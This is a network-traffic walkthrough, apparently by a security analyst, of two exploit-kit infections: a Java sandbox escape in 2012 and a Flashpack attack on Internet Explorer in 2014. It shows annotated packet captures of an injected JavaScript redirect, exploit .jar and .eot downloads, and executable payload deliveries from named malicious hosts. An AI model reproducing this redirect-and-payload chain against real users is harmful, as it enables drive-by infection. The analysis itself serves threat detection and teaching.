Detailed Analysis of the processes and stages of an Exploit Kit – Java and IE exploited by Flashpack

Here you can see the webpage that the hackers exploited (arksylhet[.]com/A67iD4eo/index.html) and inserted within that page an iframe which includes a link to a Javascript Redirect file

 

 

2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394

E…*.@…….j.+lF…P7_Z.X.X.P…...GET /Lk1SsGQm/js.js HTTP/1.1

Host: web63.server77.publicompserver[.]de

User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

Accept: */*

Accept-Language: en-us,enq=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8q=0.7,*q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://arksylhet[.]com/A67iD4eo/index.html

 

2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472

E…_…….+lF..j..P..X.X.7_|P…D…HTTP/1.1 200 OK

Date: Wed, 19 Sep 2012 02:41:54 GMT

Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g

Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT

ETag: “894002-47-4ca04cfa1a5c0″

Accept-Ranges: bytes

Content-Length: 71

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Content-Type: application/javascript

 

document.location=’http://69.194.193.34/links/systems-links_warns.php'   <—  The Javascript file simple contains a document.location variable that redirects the user to the landing page of the exploit kit

 

Redirection to the landing page, note that the referer below is the same link the Javascript had coded in it

 

2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539

E..C*@@….d..j.E..”…P.=1.v…P…J:..GET /links/systems-links_warns.phpljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1

Host: 69.194.193.34

User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

Accept: text/html,application/xhtml+xml,application/xmlq=0.9,*/*q=0.8

Accept-Language: en-us,enq=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8q=0.7,*q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://69.194.193.34/links/systems-links_warns.php

The victim is instructed to request the file “java.jar” which is a Java archive file containing the exploit for the vulnerable version of Java (1.7.0_06)

2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273

E..9*a@….M..j.E..”…P..GA.*.P…….GET /data/java.jar HTTP/1.1

accept-encoding: pack200-gzip, gzip

content-type: application/x-java-archive <— MIME TYPE

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06  <— Vulnerable version of Java

Host: 69.194.193.34

Accept: text/html, image/gif, image/jpeg, * q=.2, */* q=.2

Connection: keep-alive

2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233

E…`#……E..”..j..P..A.*...XP…3..HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Wed, 19 Sep 2012 02:42:01 GMT

Content-Type: application/java-archive

Connection: keep-alive

Content-Length: 33010

Last-Modified: Tue, 18 Sep 2012 07:17:22 GMT

Accept-Ranges: bytes

 

 

 

So, at this point the victim has been redirected to the exploit kit site and an exploit has been delivered, how do we know the exploit kit did its job

 

Below is the proof in the pudding, this is the request for a malicious executable file, we know that because there is no longer a referer in the GET request, the User-Agent will still be for Java and lastly the “accept-encoding: pack200-gzip, gzip” will not be in the request for the malicious file.

 

2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263

E../*w@….A..j.E..”…P.<..`dv.P…a…GET /links/systems-links_warns.phpvf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1   <—- Pointer on the exploit kit server to an executable file (the GET request does not have to have .exe or .zip or anything of the sorts in it for it to be an executable request, it simply points to a location on the server.

 

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06

 

Host: 69.194.193.34

 

Accept: text/html, image/gif, image/jpeg, * q=.2, */* q=.2

 

Connection: keep-alive

 

 

 

To confirm, we look at the servers response to the clients request:

 

 

 

2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460

E…`s……E..”..j..P..`dv..<..P…….HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Wed, 19 Sep 2012 02:42:05 GMT

Content-Type: application/x-msdownload

Connection: keep-alive

Content-Length: 131584

X-Powered-By: PHP/5.3.14-1~dotdeb.0

Pragma: public

Expires: Wed, 19 Sep 2012 02:42:04 GMT

Cache-Control: must-revalidate, post-check=0, pre-check=0

Cache-Control: private

Content-Disposition: attachment filename=”contacts.exe”     <—– There it is, the GET request resulted in the download of a file named “contacts.exe”

Content-Transfer-Encoding: binary

 

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

 

 

 

To summarize, at this point the exploit kit was able to successfully exploit the victims machine because it was able to make it download a file without the users consent by exploiting a vulnerability in Java that allowed a break out from the sandbox and onto the victims machine. This does not mean that the victim was infected by the file or that any malware is present on the machine. Anti-virus could have easily stopped it or another host based prevention system. The file may not have even been able to install properly.

 

 

Flashpack Web Based Exploit Kit Exploits an Internet Explorer vulnerability

 

In this scenario, the victim is using Google Translate service to view a website, the website “hitcric.info” is a legitimate website hosting live Cricket (the sport) games that has been hacked.

 

 

 

2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429

E…..@….,….Y.f”…P@HD.3.:[P….k..GET / HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: http://translate.google[.]com/translate_cdepth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible MSIE 10.0 Windows NT 6.1 WOW64 Trident/6.0)

Accept-Encoding: gzip, deflate

Host: hitcric[.]info

Connection: Keep-Alive

 

2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519

E../…….BY.f”…..P..3.:[@HF.P…,]..HTTP/1.1 302 Moved Temporarily   <—- The hackers have taken over the domain name and forwarded it to a web-based exploit kit, note the “Location:” pointer

Server: nginx admin

Date: Mon, 19 May 2014 02:13:42 GMT

Content-Type: text/html

Content-Length: 154

Connection: close

Location: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php   s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==

 

 

 

The victim has now hit what is known as the “landing page”

 

 

 

2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605

E….’@………_..Z…P’.=.n.~cP…….GET /index.phps=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: http://translate.google[.]com/translate_cdepth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible MSIE 10.0 Windows NT 6.1 WOW64 Trident/6.0)

Accept-Encoding: gzip, deflate

Connection: Keep-Alive

Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

 

2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878

E………c2_..Z…..P..n.~c’.@.P…e…HTTP/1.1 200 OK

Server: nginx/1.4.3

Date: Mon, 19 May 2014 02:27:28 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: no-store, no-cache, must-revalidate

Expires: Thu, 01 Jan 1970 00:00:01 +0000

Content-Encoding: gzip

Vary: Accept-Encoding

PASSES BROWSER INFORMATION BACK TO EXPLOIT KIT BELOW WITH THE GET REQUEST FOR “json.php”

 

2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699

E….A@….W…._..Z…P’.D.n.9.P..K.4..POST /tresting/avalonr/json.php HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible MSIE 10.0 Windows NT 6.1 WOW64 Trident/6.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

Content-Length: 207

Connection: Keep-Alive

Cache-Control: no-cache

 

id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d

2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0

E..(……fk_..Z…..P..n.9.’.G.P….d……..

2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584

E..p……d”_..Z…..P..n.9.’.G.P…L…HTTP/1.1 200 OK

Server: nginx/1.4.3

Date: Mon, 19 May 2014 02:27:47 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

Sends the Internet Explorer exploit in a font file .eot which is in a binary file format, note the large content length

 

2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285

E..E.[@………_..Z…PcS%&g^w6P..%….GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible MSIE 10.0 Windows NT 6.1 WOW64 Trident/6.0)

Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

Connection: Keep-Alive

2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268

E………aH_..Z…..P..g^w6cS&CP….c..HTTP/1.1 200 OK

Server: nginx/1.4.3

Date: Mon, 19 May 2014 02:27:48 GMT

Content-Type: application/octet-stream   <—- MIME type for a binary file

Content-Length: 22319

 

 

 

First exploit appears to have failed, here is another exploit attempt with a different exploit for Internet Explorer:

2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156

E….d@….S…._..Z…PcS&Cg^.dP…….GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1

Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

Cache-Control: no-cache

 

2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0

E..(.+….f(_..Z…..P..g^.dcS&.P…O5……..

2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268

E….,….a3_..Z…..P..g^.dcS&.P…….HTTP/1.1 200 OK

Server: nginx/1.4.3

Date: Mon, 19 May 2014 02:27:52 GMT

Content-Type: application/octet-stream

Content-Length: 13312

Connection: keep-alive

Last-Modified: Mon, 19 May 2014 02:25:29 GMT

ETag: “53796b99-3400″

Accept-Ranges: bytes

 

tc.9:999=999..99.9999999y99999999999999999999999999999999999.9997&.79.0…8u..mQPJ.IKV^KXT.ZXWWVM.[.KLW.PW.vj.TV].443.9999999..1…_C.._C.._C..^C.._C…C.._C…C.._C…C.._C…C.._C..C.._C…C.._CkPZQ.._C9999999999999999i|99u8=9..q99999999.97.28>39.9991999999 +999)999y9999P`9)99999<989<989=99999999I999=99..99:99=99=99)9999)99)999999)999i.99V999a.99A9999i999=9999999999999999999Y99E899.)99%99999999999999999999999999999999999A99.9999)99.999999999999999999999999999.MAM999..999)999.999=99999999999999.99Y.]XMX999)9999y999999.99999999999999y99..KJKZ9999=999i999=999.99999999999999y99y.KUVZ99.8999Y999999.99999999999999y99..q.999..qz999..qi989..qd999″.q^999(.qK99999999999TJOZKM.]UU9xoxip ..]UU9r|kw|u ..]UU9wmuu.uu9lj|k ..]UU9jq|uu ..]UU9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999

 

 

 

BOOM……this exploit has succeeded, the GET request for “loadsilver.php” is actually a pointer to a place on the exploit kit server for the file “e53796b9e8cb041400466334.exe” and as you can see below, another successful exploitation. Note: There is no discussion of malware here because there is no “callback” and in this example the executable fails to install properly as anti-virus quarantined the executable upon download (not that you could see that from network traffic).

2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342

E..~.u@………_..Z…P@)g.)m..P…=l..GET /tresting/avalonr/loadsilver.php HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible MSIE 7.0 Windows NT 6.1 WOW64 Trident/6.0 SLCC2 .NET CLR 2.0.50727 .NET CLR 3.5.30729 .NET CLR 3.0.30729 Media Center PC 6.0)

Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

Connection: Keep-Alive

 

2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0

E..(.….f._..Z…..P..)m..@)i!P…0………

2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268

E….@….a._..Z…..P..)m..@)i!P….L..HTTP/1.1 200 OK

Server: nginx/1.4.3

Date: Mon, 19 May 2014 02:27:53 GMT

Content-Type: application/octet-stream

Content-Length: 94514

Connection: keep-alive

X-Powered-By: PHP/5.3.3

Accept-Ranges: bytes

Content-Disposition: inline filename=e53796b9e8cb041400466334.exe

 

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..